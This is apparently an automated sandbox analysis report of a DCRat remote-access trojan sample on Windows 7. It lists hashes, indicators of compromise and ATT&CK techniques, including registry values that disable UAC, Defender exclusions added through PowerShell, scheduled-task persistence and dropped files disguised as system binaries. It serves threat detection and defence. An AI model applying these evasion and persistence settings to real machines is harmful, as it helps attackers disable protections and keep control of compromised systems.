dcrat | cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a

Analysis

max time kernel
117s
max time network
108s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
19/12/2024, 11:01 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Size

4.9MB
MD5

289ed55b09590f6399d722fda8236a7f
SHA1

592d7af9cd2ed6b2f7c06bec69e495e7f0b63ba2
SHA256

cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a
SHA512

9ac6fbe13327bd2014e5156e543e3fdba3d6b5b38cb8504475ea8f2efda34f0d1e57fc6b42ad102ae2a50a18a82779b4cfd40e65b7dc6a45e4c97192e8c149aa
SSDEEP

49152:jl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8A:A

Score

10^/10

dcrat evasion execution infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 27 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2808	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2748	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2900	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2824	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2520	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2596	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2648	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	868	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1260	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	756	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2768	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2964	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2776	2456	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	2456	schtasks.exe	30

UAC bypass 3 TTPs 27 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/1776-3-0x000000001B5F0000-0x000000001B71E000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1592	powershell.exe
308	powershell.exe
2420	powershell.exe
488	powershell.exe
824	powershell.exe
1892	powershell.exe
532	powershell.exe
1692	powershell.exe
1740	powershell.exe
1628	powershell.exe
1940	powershell.exe
892	powershell.exe

Executes dropped EXE 8 IoCs

pid	Process
2360	Idle.exe
2856	Idle.exe
1872	Idle.exe
2000	Idle.exe
2984	Idle.exe
2504	Idle.exe
2744	Idle.exe
1776	Idle.exe

Checks whether UAC is enabled 1 TTPs 18 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files\Internet Explorer\de-DE\886983d96e3d3e	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Program Files (x86)\Uninstall Information\RCXBBE1.tmp	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Program Files\Internet Explorer\de-DE\RCXBE61.tmp	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Program Files\Internet Explorer\de-DE\csrss.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Program Files (x86)\Uninstall Information\wininit.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Program Files (x86)\Uninstall Information\wininit.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Program Files (x86)\Uninstall Information\56085415360792	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Program Files\Internet Explorer\de-DE\csrss.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\RCXC26A.tmp	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Windows\de-DE\Idle.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Windows\de-DE\Idle.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Windows\es-ES\RCXC066.tmp	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Windows\es-ES\sppsvc.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Windows\Logs\DPX\56085415360792	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Windows\de-DE\6ccacd8608530f	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Windows\Logs\DPX\wininit.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File opened for modification	C:\Windows\de-DE\RCXC4DB.tmp	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Windows\es-ES\sppsvc.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Windows\es-ES\0a1fd5f707cd16	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
File created	C:\Windows\Logs\DPX\wininit.exe	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2808	schtasks.exe
2748	schtasks.exe
2520	schtasks.exe
2660	schtasks.exe
1976	schtasks.exe
2256	schtasks.exe
2864	schtasks.exe
2820	schtasks.exe
2788	schtasks.exe
1256	schtasks.exe
756	schtasks.exe
1912	schtasks.exe
2776	schtasks.exe
2824	schtasks.exe
2648	schtasks.exe
2348	schtasks.exe
868	schtasks.exe
2768	schtasks.exe
2596	schtasks.exe
1260	schtasks.exe
2656	schtasks.exe
2964	schtasks.exe
2752	schtasks.exe
1844	schtasks.exe
2900	schtasks.exe
2712	schtasks.exe
2084	schtasks.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
1592	powershell.exe
488	powershell.exe
532	powershell.exe
1940	powershell.exe
824	powershell.exe
1628	powershell.exe
2420	powershell.exe
1740	powershell.exe
892	powershell.exe
1692	powershell.exe
1892	powershell.exe
308	powershell.exe
2360	Idle.exe
2856	Idle.exe
1872	Idle.exe
2000	Idle.exe
2984	Idle.exe
2504	Idle.exe
2744	Idle.exe
1776	Idle.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	488	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	308	powershell.exe
Token: SeDebugPrivilege	2360	Idle.exe
Token: SeDebugPrivilege	2856	Idle.exe
Token: SeDebugPrivilege	1872	Idle.exe
Token: SeDebugPrivilege	2000	Idle.exe
Token: SeDebugPrivilege	2984	Idle.exe
Token: SeDebugPrivilege	2504	Idle.exe
Token: SeDebugPrivilege	2744	Idle.exe
Token: SeDebugPrivilege	1776	Idle.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1776 wrote to memory of 532	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	59
PID 1776 wrote to memory of 532	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	59
PID 1776 wrote to memory of 532	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	59
PID 1776 wrote to memory of 1940	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	60
PID 1776 wrote to memory of 1940	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	60
PID 1776 wrote to memory of 1940	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	60
PID 1776 wrote to memory of 1892	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	61
PID 1776 wrote to memory of 1892	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	61
PID 1776 wrote to memory of 1892	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	61
PID 1776 wrote to memory of 1628	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	63
PID 1776 wrote to memory of 1628	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	63
PID 1776 wrote to memory of 1628	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	63
PID 1776 wrote to memory of 892	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	65
PID 1776 wrote to memory of 892	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	65
PID 1776 wrote to memory of 892	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	65
PID 1776 wrote to memory of 824	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	66
PID 1776 wrote to memory of 824	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	66
PID 1776 wrote to memory of 824	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	66
PID 1776 wrote to memory of 1692	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	67
PID 1776 wrote to memory of 1692	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	67
PID 1776 wrote to memory of 1692	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	67
PID 1776 wrote to memory of 1592	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	68
PID 1776 wrote to memory of 1592	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	68
PID 1776 wrote to memory of 1592	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	68
PID 1776 wrote to memory of 308	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	69
PID 1776 wrote to memory of 308	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	69
PID 1776 wrote to memory of 308	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	69
PID 1776 wrote to memory of 1740	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	70
PID 1776 wrote to memory of 1740	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	70
PID 1776 wrote to memory of 1740	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	70
PID 1776 wrote to memory of 2420	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	71
PID 1776 wrote to memory of 2420	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	71
PID 1776 wrote to memory of 2420	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	71
PID 1776 wrote to memory of 488	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	72
PID 1776 wrote to memory of 488	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	72
PID 1776 wrote to memory of 488	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	72
PID 1776 wrote to memory of 1880	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	83
PID 1776 wrote to memory of 1880	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	83
PID 1776 wrote to memory of 1880	1776	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe	83
PID 1880 wrote to memory of 2764	1880	cmd.exe	85
PID 1880 wrote to memory of 2764	1880	cmd.exe	85
PID 1880 wrote to memory of 2764	1880	cmd.exe	85
PID 1880 wrote to memory of 2360	1880	cmd.exe	86
PID 1880 wrote to memory of 2360	1880	cmd.exe	86
PID 1880 wrote to memory of 2360	1880	cmd.exe	86
PID 2360 wrote to memory of 2212	2360	Idle.exe	87
PID 2360 wrote to memory of 2212	2360	Idle.exe	87
PID 2360 wrote to memory of 2212	2360	Idle.exe	87
PID 2360 wrote to memory of 944	2360	Idle.exe	88
PID 2360 wrote to memory of 944	2360	Idle.exe	88
PID 2360 wrote to memory of 944	2360	Idle.exe	88
PID 2212 wrote to memory of 2856	2212	WScript.exe	89
PID 2212 wrote to memory of 2856	2212	WScript.exe	89
PID 2212 wrote to memory of 2856	2212	WScript.exe	89
PID 2856 wrote to memory of 2796	2856	Idle.exe	90
PID 2856 wrote to memory of 2796	2856	Idle.exe	90
PID 2856 wrote to memory of 2796	2856	Idle.exe	90
PID 2856 wrote to memory of 1832	2856	Idle.exe	91
PID 2856 wrote to memory of 1832	2856	Idle.exe	91
PID 2856 wrote to memory of 1832	2856	Idle.exe	91
PID 2796 wrote to memory of 1872	2796	WScript.exe	92
PID 2796 wrote to memory of 1872	2796	WScript.exe	92
PID 2796 wrote to memory of 1872	2796	WScript.exe	92
PID 1872 wrote to memory of 756	1872	Idle.exe	93

System policy modification 1 TTPs 27 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
